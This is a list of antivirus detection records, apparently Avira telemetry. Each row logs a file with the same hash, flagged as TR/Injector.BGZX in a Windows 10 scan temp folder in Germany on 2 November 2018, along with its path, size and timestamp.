  Row(detection=Row(filename='avscan-20181102-060835-b3f6b364', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060835-B3F6B364', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053609-2bddfacb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053609-2BDDFACB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053608-2bb521d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053608-2BB521D2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051603-5d73b8fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051603-5D73B8FE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061735-f611fb64', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061735-F611FB64', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060806-a2d3fc9b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060806-A2D3FC9B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051640-7354951d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051640-7354951D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062541-179d2bd6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062541-179D2BD6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051652-7ab63c81', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051652-7AB63C81', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062147-8be0360d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062147-8BE0360D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053645-4195ec4c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053645-4195EC4C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061854-24dc2dc1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061854-24DC2DC1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061707-e5470bf2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061707-E5470BF2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055329-97e5c429', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055329-97E5C429', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051621-67cf8d41', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051621-67CF8D41', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061808-09a684fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061808-09A684FD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055057-3d1e6ca8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055057-3D1E6CA8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055023-28d14991', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055023-28D14991', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061729-f2502c8a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061729-F2502C8A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055022-28a9e7a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055022-28A9E7A5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053643-4086341b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053643-4086341B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060850-bcc62106', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060850-BCC62106', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061805-07c8390b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061805-07C8390B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061805-07db3dc8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061805-07DB3DC8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051617-658411cd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051617-658411CD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051649-78b87ee4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051649-78B87EE4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051629-6cd2026c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051629-6CD2026C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061849-21e58948', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061849-21E58948', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051647-7754971b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051647-7754971B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061756-02233b3c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061756-02233B3C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053618-316b84a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053618-316B84A2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062507-032fc837', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062507-032FC837', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061744-fb6c2503', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061744-FB6C2503', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053700-4a9c2410', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053700-4A9C2410', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060802-a086569a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060802-A086569A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062535-13d057a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062535-13D057A0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062535-13ab1141', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062535-13AB1141', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061825-13ecdcc6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061825-13ECDCC6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061825-13ca0dff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061825-13CA0DFF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060853-bea1ec23', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060853-BEA1EC23', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053612-2d93fc7b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053612-2D93FC7B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061825-13bb6744', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061825-13BB6744', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061826-13f08a24', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061826-13F08A24', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053622-33ce8f67', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053622-33CE8F67', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060857-c1477c83', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060857-C1477C83', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055344-a12483b5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055344-A12483B5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060857-c14b3943', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060857-C14B3943', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051659-7ec2cb5e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051659-7EC2CB5E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053620-32a7bc81', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053620-32A7BC81', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061843-1e6fe129', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061843-1E6FE129', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061745-fbcf30c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061745-FBCF30C9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051630-6d2dc595', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051630-6D2DC595', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053619-3201f186', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053619-3201F186', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055043-350fa3d1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055043-350FA3D1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062539-16722f10', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062539-16722F10', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:38Z'), dt=datetime.date(2018, 11, 2)),
